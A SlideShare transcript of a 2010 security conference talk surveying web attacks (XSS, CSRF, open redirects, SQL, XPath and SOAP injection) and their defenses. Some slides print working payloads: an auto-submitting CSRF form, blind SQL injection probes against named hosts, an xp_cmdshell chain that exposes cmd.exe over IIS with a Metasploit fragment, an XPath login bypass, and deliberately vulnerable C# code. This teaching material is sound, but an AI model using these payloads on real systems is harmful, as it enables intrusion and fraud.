SlideShare a Scribd company logo

Web Attacks - Top threats - 2010

Shreeraj Shah
Shreeraj Shah

The document summarizes various web application vulnerabilities from 2010, including client-side attacks like cross-site scripting (XSS) and cross-site request forgery (CSRF), and server-side attacks like SQL injection, XML injection, and remote code execution via stored procedures. It provides examples of exploiting these vulnerabilities on modern web applications and defenses against these attacks.

Related slideshows

Web Services Hacking and Security
Web Services Hacking and SecurityWeb Services Hacking and Security
Web Services Hacking and Security
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
 
1 of 55
Session F3 Defending against the worst web-based application vulnerabilities of 2010 Date: Monday, 19 April 2010 Time: 3:45pm - 5pm Shreeraj Shah Founder and Director, Blueinfy; Author, Web 2.0 Security and Web Hacking: Attacks and Defense
Who Am I? Founder & Director Blueinfy Solutions Pvt. Ltd. (Brief) SecurityExposure.com Past experience Net Square, Chase, IBM & Foundstone Interest Web security research Published research Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc. Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. Advisories - .Net, Java servers etc. Books (Author) Web 2.0 Security – Defending Ajax, RIA and SOA Hacking Web Services Web Hacking http://shreeraj.blogspot.com [email_address] http://www.blueinfy.com
2010 - WEB ATTACKS
Real Life Analysis and Cases Accessing infrastructure through LDAP injection Replicating full financial database from one Blind SQL injection Accessing other user’s banking account through Logical business flaw Client side control and hacking through CSRF and XSS Results – Full control over web applications
Technology Trends Web 2.0 – Ajax, Silverlight and Flex/Flash Web Services and SOA Cloud APIs and SaaS Browser empowering – HTML 5 and several other features Traditional stacks are evolving around frameworks
Past, Present and Future Cloud 2010 Focus
Major Overlap in Web Apps Presentation Layer Business Layer Utility Layer Data Access Authentication Communication etc . Runtime, Platform, Operating System Components Server side Components Client side Components (Browser)
Next Generation Apps Site pageflakes.com (SaaS) Web 2.0 Start page Mashup for various applications Using .NET and Ajax technologies Can access mails, news etc. from the same page Various Widgets and modules
Next Generation Architecture HTML / JS / DOM RIA (Flash) Ajax Browser Internet Blog Web 2.0 Start Database Authentication Application Infrastructure Web Services End point Internet Mails News Documents Weather Bank/Trade RSS feeds
OWASP & WASC/TC
Vulnerability distribution WASC Stats.
CLIENT SIDE ATTACKS
Client Side Vulnerabilities V1 - XSS (DOM, Mashup, Widget, RSS feeds etc.) V2 - CSRF (XML) V3 - Redirects and Forwards (Phishing and Trust break)
V1 - Distributed DOM driven XSS Web Server DB DB Web app attacker Web app Web app proxy Web Client 8008 XML/JSON/JS-Obj Stream eval() XSS
DOM Exploit Points document.write(…) document.writeln(…) document.body.innerHtml=… document.forms[0].action=… document.attachEvent(…) document.create…(…) document.execCommand(…) document.body. … window.attachEvent(…) document.location=… document.location.hostname=… document.location.replace(…) document.location.assign(…) document.URL=… window.navigate(…)
Exploiting RSS feeds RSS feeds consuming un-trusted sources. Feed readers common component Vulnerable to DOM driven XSS. Malicious code injection and attaching browser.
Mashups Exploits API exposure for Mashup application. Building applications with APIs Cross Domain access by callback may cause a security breach. Extensive DOM leverage – inject and exploit
Widgets/Gadgets Exploits DOM sharing model can cause many security issues. One widget can change information on another widget – possible. CSRF injection through widget code. Event hijacking is possible – Common DOM
Defense Input validation and encoding JavaScript – source code analysis Widget – DOM sharing issue Information validation and trusted source consumption XSS protection and Cross Domain Blocking
V2 - Cross Site Request Forgery (CSRF) Next Generation CSRF Is it possible to do CSRF to XML stream How? It will be POST hitting the XML processing resources like Web Services JSON CSRF is also possible Interesting check to make against application and Web 2.0 resources
One Way CSRF Scenario
One Way CSRF Scenario
One Way CSRF Scenario
One Way CSRF Scenario
One-Way CSRF
One-Way CSRF <html> <body> <FORM NAME=&quot;buy&quot; ENCTYPE=&quot;text/plain&quot; action=&quot;http://trade.example.com/xmlrpc/trade.rem&quot; METHOD=&quot;POST&quot;> <input type=&quot;hidden&quot; name='<?xml version' value='&quot;1.0&quot;?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>' > </FORM> <script>document.buy.submit();</script> </body> </html>
Forcing XML Splitting XML stream in the form. Possible through XForms as well. Similar techniques is applicable to JSON as well.
Defense Server Side Checks Check for client’s content-type. XHR calls – xml/application. Native calls – text/html. Filtering is possible on it. Client Side Checks Stream can be started and terminated by /* or any predefined characters. Client can remove them before injecting to DOM.
V3 – Redirects and Forward issues As a part of root cause, there must be a redirect hole Example, http://foo.bank.com/login.aspx?user=xxx&page=trade.aspx Here “page” is a vulnerable parameter What if? Some one put page=http://yahoo.com …
Attack Anatomy Attacker foo.bank.com http://foo.bank.com/login.aspx?user=xxx& page=http://yahoo.com Get redirect or JavaScript call for loading yahoo.com Vulnerability detected!!! Detection
Attack Anatomy Click the link Get a redirect response to 203.88.XX.XX 1 Link in mail Threat
Attack Anatomy Bank’s user foo.bank.com Click the link Get a redirect response to 203.88.XX.XX 203.88.XX.XX (Attacker’s area) Bank’s user Send dummy form Trusted evil redirect 2
Attack Anatomy Bank’s user foo.bank.com Click the link Get a redirect response to 203.88.XX.XX 203.88.XX.XX (Attacker’s area) Bank’s user Send dummy form Bank’s user Send username and password Send dummy response (Thanks!) Trusted evil redirect 203.88.XX.XX (Attacker’s area) 3
Attack Anatomy Bank’s user foo.bank.com Click the link Get a redirect response to 203.88.XX.XX 203.88.XX.XX (Attacker’s area) Bank’s user Send dummy form Bank’s user Send username and password Send dummy response (Thanks!) Trusted evil redirect 203.88.XX.XX (Attacker’s area) Logs in and do money transfer 4
Defense Need to validate parameters before passing to redirect calls on server side Filtering http:// or https:// Do not pass values to JavaScript redirect before filtering or validating Deployment level redirect should not rely on http parameters coming from user Checking referrer on important forms
SERVER SIDE ATTACKS
Server Side Vulnerabilities V4 - Advanced SQL injection (Blind/XML/JSON) V5 – XPATH Injection V6 – Reverse Engineering V7 – Logical Attacks V8 – WSDL discovery V9 – SOAP faultcode leakage V10 – SOAP injections
V4 - Advanced SQL injections SQL injection over JSON streams Flash based points XML data access layer exposure Errors are not standard in 500 200 and messages are embedded in the stream
Blind SQL Injection We have SQL injection point but it is not throwing any error message out as part of its response. Application is sending customized error page which is not revealing any signature by which we can deduce potential SQL flaw. Knowing SQL injection point or loophole in web application, xp_cmdshell seems to be working. But we can’t say is it working or not since it doesn’t return any meaningful signature. This is “blind xp_cmdshell”. Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from the box to the Internet by which you can confirm execution of the command on the target system. We don’t know the actual path to webroot so can’t copy file to location which can be accessed over HTTP or HTTPS later to confirm the execution of the command. If we know path to webroot and directory structure but can’t find execute permission on it so can’t copy cmd.exe or any other binary and execute over HTTP/HTTPS.
Checks… AND 1=1 DBO check http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()='dbo' Wait delay call http://192.168.50.50/details.aspx?id=1;waitfor+delay+'0:0:10' (SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115 http://www.dvds4less.net/details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114 http://www.dvds4less.net/details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),2,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=97
Running tools SQL Map or Absinthe D:oolsqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:47:58 [18:48:00] [WARNING] the remote DMBS is not MySQL [18:48:00] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) --- [*] shutting down at: 18:48:14
Exploiting Set WshShell = WScript.CreateObject(&quot;WScript.Shell&quot;) Set ObjExec = WshShell.Exec(&quot;cmd.exe /c echo %windir%&quot;) windir = ObjExec.StdOut.ReadLine() Set Root = GetObject(&quot;IIS://LocalHost/W3SVC/1/ROOT&quot;) Set Dir = Root.Create(&quot;IIsWebVirtualDir&quot;, &quot;secret&quot;) Dir.Path = windir Dir.AccessExecute = True Dir.SetInfo http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Set WshShell = WScript.CreateObject(&quot;WScript.Shell&quot;) > c:ecret.vbs’ … .. … .. … .. http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Dir.SetInfo >> c:ecret.vbs’ http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:ecret.vbs’
Get the cmd.exe Run command over HTTP/HTTPS http://target/secret/system32/cmd.exe?+/c+set
Metasploit … sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $path = $self->GetVar('RPATH'); my $vhost = $self->GetVar('VHOST'); my @url = split(/#/, $path); my @payload = (&quot;EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject(amp;quot;WScript.Shellamp;quot;)>c:secret.vbs'&quot;, &quot;EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject(amp;quot;IIS://LocalHost/W3SVC/1/ROOTamp;quot;)>>c:secret.vbs'&quot;, &quot;EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create(amp;quot;IIsWebVirtualDiramp;quot;,amp;quot;secretamp;quot;)>>c:secret.vb s'&quot;, &quot;EXEC+master..xp_cmdshell+'echo+Dir.Path+=+amp;quot;c:winntsystem32amp;quot;>>c:secret.vbs'&quot;, &quot;EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:secret.vbs'&quot;, &quot;EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:secret.vbs'&quot;, &quot;EXEC+master..xp_cmdshell+'cscript+c:secret.vbs'&quot; ); $self->PrintLine(&quot;[+] Sending SQL injection payload...&quot;); for(my $count=0;$count<=6;$count++) ..
V5 - XPATH injection XPATH parsing standard error XPATH is method available for XML parsing MS SQL server provides interface and one can get table content in XML format. Once this is fetched one can run XPATH queries and obtain results. What if username/password parsing done on using XPATH – XPATH injection
XPATH injection string fulltext = &quot;&quot;; string coString = &quot;Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass&quot;; SqlXmlCommand co = new SqlXmlCommand(coString); co.RootTag=&quot;Credential&quot;; co.CommandType = SqlXmlCommandType.Sql; co.CommandText = &quot;SELECT * FROM users for xml Auto&quot;; XmlReader xr = co.ExecuteXmlReader(); xr.MoveToContent(); fulltext = xr.ReadOuterXml(); XmlDocument doc = new XmlDocument(); doc.LoadXml(fulltext); string credential = &quot;//users[@username='&quot;+user+&quot;' and @password='&quot;+pass+&quot;']&quot;; XmlNodeList xmln = doc.SelectNodes(credential); string temp; if(xmln.Count > 0) { //True } else //false
XPATH injection string credential = &quot;//users[@username='&quot;+user+&quot;' and @password='&quot;+pass+&quot;']&quot;; XPATH parsing can be leveraged by passing following string ' or 1=1 or ''=‘ This will always true on the first node and user can get access as who ever is first user. Bingo!
V6 - Revere Engineering It is possible to reverse engineer RIA apps Attacking Flash and Silverlight components Identifying hidden treasure and business logic Crafting attacks based on enumerated information
V7 - Logical Attack Exploiting application layer weakness with logical issues Accessing unauthorized information Analyzing code – JavaScript analysis and logical errors Several key areas can be exploited Debugging and Reverse Engineering helps a lot
V8 - WSDL Discovery Attacks Search in the public domain Tool – Search Engines Look for wsdl,asmx,jws etc. Filetype and allinurl
V9 - Fault code leakage with SOAP Fault code of web services spit lot of information about internal workings. This attack can fetch internal paths, database interfaces etc. Fault code is part of SOAP envelope and this helps an attacker to make logical deduction about assets.
V10 – SOAP injections (SQL) SQL injection can be done using SOAP traffic. It is innovative way of identifying database interface points. One can leverage xp_cmdshell via SOAP. Back end database can be compromised using this attack.
Defending Input validations across streams – XML, JSON and Name-Value pairs Not to put logic in client side components running in Flash and Silverlight Extra attention and code review for logical attacks WSDL and SOAP security around Web Services
Key Controls WAF for stream protection Source Code Review during SDLC Developers knowledge base Secure API and Library usage across enterprise Secure SDLC with various controls including threat modeling Web 2.0 Attacks and Countermeasure strategies
CONCLUSION – QUESTIONS! [email_address] http://www.blueinfy.com

More Related Content

Web Attacks - Top threats - 2010

  • 1. Session F3 Defending against the worst web-based application vulnerabilities of 2010 Date: Monday, 19 April 2010 Time: 3:45pm - 5pm Shreeraj Shah Founder and Director, Blueinfy; Author, Web 2.0 Security and Web Hacking: Attacks and Defense
  • 2. Who Am I? Founder & Director Blueinfy Solutions Pvt. Ltd. (Brief) SecurityExposure.com Past experience Net Square, Chase, IBM & Foundstone Interest Web security research Published research Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc. Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. Advisories - .Net, Java servers etc. Books (Author) Web 2.0 Security – Defending Ajax, RIA and SOA Hacking Web Services Web Hacking http://shreeraj.blogspot.com [email_address] http://www.blueinfy.com
  • 3. 2010 - WEB ATTACKS
  • 4. Real Life Analysis and Cases Accessing infrastructure through LDAP injection Replicating full financial database from one Blind SQL injection Accessing other user’s banking account through Logical business flaw Client side control and hacking through CSRF and XSS Results – Full control over web applications
  • 5. Technology Trends Web 2.0 – Ajax, Silverlight and Flex/Flash Web Services and SOA Cloud APIs and SaaS Browser empowering – HTML 5 and several other features Traditional stacks are evolving around frameworks
  • 6. Past, Present and Future Cloud 2010 Focus
  • 7. Major Overlap in Web Apps Presentation Layer Business Layer Utility Layer Data Access Authentication Communication etc . Runtime, Platform, Operating System Components Server side Components Client side Components (Browser)
  • 8. Next Generation Apps Site pageflakes.com (SaaS) Web 2.0 Start page Mashup for various applications Using .NET and Ajax technologies Can access mails, news etc. from the same page Various Widgets and modules
  • 9. Next Generation Architecture HTML / JS / DOM RIA (Flash) Ajax Browser Internet Blog Web 2.0 Start Database Authentication Application Infrastructure Web Services End point Internet Mails News Documents Weather Bank/Trade RSS feeds
  • 13. Client Side Vulnerabilities V1 - XSS (DOM, Mashup, Widget, RSS feeds etc.) V2 - CSRF (XML) V3 - Redirects and Forwards (Phishing and Trust break)
  • 14. V1 - Distributed DOM driven XSS Web Server DB DB Web app attacker Web app Web app proxy Web Client 8008 XML/JSON/JS-Obj Stream eval() XSS
  • 15. DOM Exploit Points document.write(…) document.writeln(…) document.body.innerHtml=… document.forms[0].action=… document.attachEvent(…) document.create…(…) document.execCommand(…) document.body. … window.attachEvent(…) document.location=… document.location.hostname=… document.location.replace(…) document.location.assign(…) document.URL=… window.navigate(…)
  • 16. Exploiting RSS feeds RSS feeds consuming un-trusted sources. Feed readers common component Vulnerable to DOM driven XSS. Malicious code injection and attaching browser.
  • 17. Mashups Exploits API exposure for Mashup application. Building applications with APIs Cross Domain access by callback may cause a security breach. Extensive DOM leverage – inject and exploit
  • 18. Widgets/Gadgets Exploits DOM sharing model can cause many security issues. One widget can change information on another widget – possible. CSRF injection through widget code. Event hijacking is possible – Common DOM
  • 19. Defense Input validation and encoding JavaScript – source code analysis Widget – DOM sharing issue Information validation and trusted source consumption XSS protection and Cross Domain Blocking
  • 20. V2 - Cross Site Request Forgery (CSRF) Next Generation CSRF Is it possible to do CSRF to XML stream How? It will be POST hitting the XML processing resources like Web Services JSON CSRF is also possible Interesting check to make against application and Web 2.0 resources
  • 21. One Way CSRF Scenario
  • 22. One Way CSRF Scenario
  • 23. One Way CSRF Scenario
  • 24. One Way CSRF Scenario
  • 26. One-Way CSRF <html> <body> <FORM NAME=&quot;buy&quot; ENCTYPE=&quot;text/plain&quot; action=&quot;http://trade.example.com/xmlrpc/trade.rem&quot; METHOD=&quot;POST&quot;> <input type=&quot;hidden&quot; name='<?xml version' value='&quot;1.0&quot;?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>' > </FORM> <script>document.buy.submit();</script> </body> </html>
  • 27. Forcing XML Splitting XML stream in the form. Possible through XForms as well. Similar techniques is applicable to JSON as well.
  • 28. Defense Server Side Checks Check for client’s content-type. XHR calls – xml/application. Native calls – text/html. Filtering is possible on it. Client Side Checks Stream can be started and terminated by /* or any predefined characters. Client can remove them before injecting to DOM.
  • 29. V3 – Redirects and Forward issues As a part of root cause, there must be a redirect hole Example, http://foo.bank.com/login.aspx?user=xxx&page=trade.aspx Here “page” is a vulnerable parameter What if? Some one put page=http://yahoo.com …
  • 30. Attack Anatomy Attacker foo.bank.com http://foo.bank.com/login.aspx?user=xxx& page=http://yahoo.com Get redirect or JavaScript call for loading yahoo.com Vulnerability detected!!! Detection
  • 31. Attack Anatomy Click the link Get a redirect response to 203.88.XX.XX 1 Link in mail Threat
  • 32. Attack Anatomy Bank’s user foo.bank.com Click the link Get a redirect response to 203.88.XX.XX 203.88.XX.XX (Attacker’s area) Bank’s user Send dummy form Trusted evil redirect 2
  • 33. Attack Anatomy Bank’s user foo.bank.com Click the link Get a redirect response to 203.88.XX.XX 203.88.XX.XX (Attacker’s area) Bank’s user Send dummy form Bank’s user Send username and password Send dummy response (Thanks!) Trusted evil redirect 203.88.XX.XX (Attacker’s area) 3
  • 34. Attack Anatomy Bank’s user foo.bank.com Click the link Get a redirect response to 203.88.XX.XX 203.88.XX.XX (Attacker’s area) Bank’s user Send dummy form Bank’s user Send username and password Send dummy response (Thanks!) Trusted evil redirect 203.88.XX.XX (Attacker’s area) Logs in and do money transfer 4
  • 35. Defense Need to validate parameters before passing to redirect calls on server side Filtering http:// or https:// Do not pass values to JavaScript redirect before filtering or validating Deployment level redirect should not rely on http parameters coming from user Checking referrer on important forms
  • 37. Server Side Vulnerabilities V4 - Advanced SQL injection (Blind/XML/JSON) V5 – XPATH Injection V6 – Reverse Engineering V7 – Logical Attacks V8 – WSDL discovery V9 – SOAP faultcode leakage V10 – SOAP injections
  • 38. V4 - Advanced SQL injections SQL injection over JSON streams Flash based points XML data access layer exposure Errors are not standard in 500 200 and messages are embedded in the stream
  • 39. Blind SQL Injection We have SQL injection point but it is not throwing any error message out as part of its response. Application is sending customized error page which is not revealing any signature by which we can deduce potential SQL flaw. Knowing SQL injection point or loophole in web application, xp_cmdshell seems to be working. But we can’t say is it working or not since it doesn’t return any meaningful signature. This is “blind xp_cmdshell”. Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from the box to the Internet by which you can confirm execution of the command on the target system. We don’t know the actual path to webroot so can’t copy file to location which can be accessed over HTTP or HTTPS later to confirm the execution of the command. If we know path to webroot and directory structure but can’t find execute permission on it so can’t copy cmd.exe or any other binary and execute over HTTP/HTTPS.
  • 40. Checks… AND 1=1 DBO check http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()='dbo' Wait delay call http://192.168.50.50/details.aspx?id=1;waitfor+delay+'0:0:10' (SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115 http://www.dvds4less.net/details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114 http://www.dvds4less.net/details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),2,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=97
  • 41. Running tools SQL Map or Absinthe D:oolsqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:47:58 [18:48:00] [WARNING] the remote DMBS is not MySQL [18:48:00] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) --- [*] shutting down at: 18:48:14
  • 42. Exploiting Set WshShell = WScript.CreateObject(&quot;WScript.Shell&quot;) Set ObjExec = WshShell.Exec(&quot;cmd.exe /c echo %windir%&quot;) windir = ObjExec.StdOut.ReadLine() Set Root = GetObject(&quot;IIS://LocalHost/W3SVC/1/ROOT&quot;) Set Dir = Root.Create(&quot;IIsWebVirtualDir&quot;, &quot;secret&quot;) Dir.Path = windir Dir.AccessExecute = True Dir.SetInfo http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Set WshShell = WScript.CreateObject(&quot;WScript.Shell&quot;) > c:ecret.vbs’ … .. … .. … .. http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Dir.SetInfo >> c:ecret.vbs’ http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:ecret.vbs’
  • 43. Get the cmd.exe Run command over HTTP/HTTPS http://target/secret/system32/cmd.exe?+/c+set
  • 44. Metasploit … sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $path = $self->GetVar('RPATH'); my $vhost = $self->GetVar('VHOST'); my @url = split(/#/, $path); my @payload = (&quot;EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject(amp;quot;WScript.Shellamp;quot;)>c:secret.vbs'&quot;, &quot;EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject(amp;quot;IIS://LocalHost/W3SVC/1/ROOTamp;quot;)>>c:secret.vbs'&quot;, &quot;EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create(amp;quot;IIsWebVirtualDiramp;quot;,amp;quot;secretamp;quot;)>>c:secret.vb s'&quot;, &quot;EXEC+master..xp_cmdshell+'echo+Dir.Path+=+amp;quot;c:winntsystem32amp;quot;>>c:secret.vbs'&quot;, &quot;EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:secret.vbs'&quot;, &quot;EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:secret.vbs'&quot;, &quot;EXEC+master..xp_cmdshell+'cscript+c:secret.vbs'&quot; ); $self->PrintLine(&quot;[+] Sending SQL injection payload...&quot;); for(my $count=0;$count<=6;$count++) ..
  • 45. V5 - XPATH injection XPATH parsing standard error XPATH is method available for XML parsing MS SQL server provides interface and one can get table content in XML format. Once this is fetched one can run XPATH queries and obtain results. What if username/password parsing done on using XPATH – XPATH injection
  • 46. XPATH injection string fulltext = &quot;&quot;; string coString = &quot;Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass&quot;; SqlXmlCommand co = new SqlXmlCommand(coString); co.RootTag=&quot;Credential&quot;; co.CommandType = SqlXmlCommandType.Sql; co.CommandText = &quot;SELECT * FROM users for xml Auto&quot;; XmlReader xr = co.ExecuteXmlReader(); xr.MoveToContent(); fulltext = xr.ReadOuterXml(); XmlDocument doc = new XmlDocument(); doc.LoadXml(fulltext); string credential = &quot;//users[@username='&quot;+user+&quot;' and @password='&quot;+pass+&quot;']&quot;; XmlNodeList xmln = doc.SelectNodes(credential); string temp; if(xmln.Count > 0) { //True } else //false
  • 47. XPATH injection string credential = &quot;//users[@username='&quot;+user+&quot;' and @password='&quot;+pass+&quot;']&quot;; XPATH parsing can be leveraged by passing following string ' or 1=1 or ''=‘ This will always true on the first node and user can get access as who ever is first user. Bingo!
  • 48. V6 - Revere Engineering It is possible to reverse engineer RIA apps Attacking Flash and Silverlight components Identifying hidden treasure and business logic Crafting attacks based on enumerated information
  • 49. V7 - Logical Attack Exploiting application layer weakness with logical issues Accessing unauthorized information Analyzing code – JavaScript analysis and logical errors Several key areas can be exploited Debugging and Reverse Engineering helps a lot
  • 50. V8 - WSDL Discovery Attacks Search in the public domain Tool – Search Engines Look for wsdl,asmx,jws etc. Filetype and allinurl
  • 51. V9 - Fault code leakage with SOAP Fault code of web services spit lot of information about internal workings. This attack can fetch internal paths, database interfaces etc. Fault code is part of SOAP envelope and this helps an attacker to make logical deduction about assets.
  • 52. V10 – SOAP injections (SQL) SQL injection can be done using SOAP traffic. It is innovative way of identifying database interface points. One can leverage xp_cmdshell via SOAP. Back end database can be compromised using this attack.
  • 53. Defending Input validations across streams – XML, JSON and Name-Value pairs Not to put logic in client side components running in Flash and Silverlight Extra attention and code review for logical attacks WSDL and SOAP security around Web Services
  • 54. Key Controls WAF for stream protection Source Code Review during SDLC Developers knowledge base Secure API and Library usage across enterprise Secure SDLC with various controls including threat modeling Web 2.0 Attacks and Countermeasure strategies
  • 55. CONCLUSION – QUESTIONS! [email_address] http://www.blueinfy.com

Editor's Notes

  1. The famous web application set up diagram. Walk through each component, mention their roles. Web client - HTTP connections Firewall - lets in only HTTP requests, and allows only outbound HTTP responses Web server - handles all initial requests Applications - run either on the web server, or on app servers Database - SQL databases, and connection interfaces